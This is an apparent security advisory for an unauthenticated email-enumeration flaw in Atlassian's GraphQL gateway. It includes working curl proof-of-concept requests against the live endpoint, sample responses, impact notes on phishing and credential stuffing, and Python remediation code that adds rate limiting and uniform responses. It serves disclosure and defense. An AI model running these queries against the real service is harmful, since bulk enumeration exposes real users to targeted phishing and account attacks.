## https://sploitus.com/exploit?id=PACKETSTORM:224966
# CVE-2026-XXXX: Atlassian Central GraphQL - Email Enumeration Oracle
## Product
**Atlassian Central GraphQL Gateway** (`api.atlassian.com/graphql`)
## Vulnerability Type
**CWE-204: Observable Response Discrepancy** - Email Enumeration Oracle
## Severity
**MEDIUM** - CVSS 5.3 `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
## Description
The `loomUnauthenticated_primaryAuthTypeForEmail` GraphQL query on Atlassian's central GraphQL gateway returns different responses depending on whether an email address is registered with Atlassian, allowing unauthenticated user enumeration.
**Registered email**: returns `authType` (e.g. `workos`, `password`, `google`) and a redirect URI
**Unregistered email**: returns `authType: "none"` with no redirect URI
No authentication is required. The query name includes "Unauthenticated", so it is intentionally public, but it shouldn't leak whether an arbitrary email has an Atlassian account.
## Affected Versions
- Atlassian Central GraphQL Gateway (snapshot 37157, build 2026-07-02)
- Endpoint: `https://api.atlassian.com/graphql`
## Proof of Concept
### Registered email (returns auth provider):
```bash
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"admin@atlassian.com\") { authType hasActiveMemberships redirectUri } }"}'
```
Response:
```json
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "workos",
      "hasActiveMemberships": false,
      "redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
    }
  }
}
```
### Unregistered email (returns none):
```bash
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"noone@nonexist9999.com\") { authType } }"}'
```
Response:
```json
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "none"
    }
  }
}
```
### Also leaks: email to auth provider mapping
`authType: "workos"` confirms the email uses WorkOS SSO; `authType: "google"` or `authType: "password"` would likewise reveal the authentication method. This enables targeted phishing.
## Impact
An unauthenticated attacker can:
- Enumerate registered Atlassian/Loom accounts at scale
- Map emails to their authentication provider (Google SSO, WorkOS, password)
- Use auth provider information for targeted phishing campaigns
- Build lists of valid Atlassian users for credential stuffing
## Root Cause
The `loomUnauthenticated_primaryAuthTypeForEmail` query performs no rate-limiting and returns auth provider information for any email without authentication. While the endpoint is intentionally unauthenticated (for Loom's signup flow), it leaks whether an email has an account and which auth provider they use.
## Remediation
1. Add rate-limiting to prevent bulk enumeration
2. Return a consistent response for both registered and unregistered emails
3. OR: require a CAPTCHA/nonce before querying email status
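A resolver shape for remediation steps 1 and 2, as an added example that is not Atlassian's or the gateway's code: the discrepancy from the PoC reproduced beside a version that throttles per caller and returns one fixed body for every email. The in-memory account store, the fixed-window limiter and the generic sign-in URL are assumptions.

```python
import time
from collections import defaultdict
from urllib.parse import quote

# Constructed sample directory (placeholder data): email -> auth provider.
ACCOUNTS = {"alice@example.com": "workos", "bob@example.com": "password"}


class FixedWindowLimiter:
    """Per-caller fixed-window counter; the key would be e.g. the source IP."""

    def __init__(self, limit, window_seconds, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window_seconds, clock
        self.buckets = defaultdict(lambda: [0.0, 0])  # key -> [window_start, count]

    def allow(self, key):
        now = self.clock()
        bucket = self.buckets[key]
        if now - bucket[0] >= self.window:  # window expired: start a new one
            bucket[0], bucket[1] = now, 0
        bucket[1] += 1
        return bucket[1] <= self.limit


def vulnerable_resolver(email):
    """Reproduces the advisory's discrepancy: both authType and the presence
    of redirectUri depend on whether the email is registered."""
    provider = ACCOUNTS.get(email)
    if provider is None:
        return {"authType": "none"}
    return {"authType": provider, "hasActiveMemberships": False,
            "redirectUri": f"https://www.loom.com/api/auth/{provider}?email={quote(email)}"}


def hardened_resolver(email, caller, limiter):
    """Remediation steps 1 and 2: throttle per caller and return one fixed body
    for every email. The email is deliberately never looked up here, so there is
    neither a content nor a timing signal; the provider is resolved later, behind
    the generic sign-in page (hypothetical flow, placeholder URL)."""
    if not limiter.allow(caller):
        return {"errors": [{"message": "rate limited"}]}
    return {"authType": "unknown", "hasActiveMemberships": False,
            "redirectUri": "https://www.loom.com/login"}


def leaks_existence(answer):
    """Oracle check: do a registered and an unregistered email get different bodies?"""
    return answer("alice@example.com") != answer("nobody@example.invalid")
```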
## What This Is NOT
After thorough testing, these claims were **invalidated**:
- No JWT token with privileges (tokens have `aaid: "unidentified"`)
- No admin mutation execution (all fail with `ValidationError`)
- No authentication bypass (gateway correctly identifies caller as `unidentified`)
- No data leakage beyond email/auth-provider mapping
## Timeline
- **2026-06-30:** Discovered
- **2026-06-30:** Reported to security@atlassian.com
- **2026-07-02:** Corrected assessment: downgraded from Critical (9.8) to Medium (5.3)
## Discovered By
Wh4l3X